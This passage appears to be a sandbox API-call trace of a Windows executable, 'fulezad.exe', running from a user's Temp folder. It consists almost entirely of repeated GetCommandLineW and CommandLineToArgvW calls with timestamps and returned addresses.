returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287880*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2878f8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287970*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2879e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287a60*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287ad8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287b50*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287bc8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287c40*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287cb8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287d30*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287da8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287e20*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287e98*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287f10*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287f88*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288000*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288078*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.821] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2880f0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.821] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288168*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2881e0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288258*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2882d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288348*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2883c0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288438*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2884b0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288528*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.822] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.822] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2885a0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288618*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288690*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288808*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288880*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2888f8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288970*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.823] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2889e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.823] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288a60*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288ad8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288b50*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288bc8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288c40*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288cb8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288d30*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288da8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288e20*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.824] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288e98*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.824] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288f10*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x288f88*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289000*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289078*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2890f0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289168*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2891e0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289258*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2892d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289348*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.825] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2893c0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289438*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2894b0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289528*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2895a0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289618*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289690*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.826] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289808*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289880*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2898f8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289970*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2899e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289a60*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 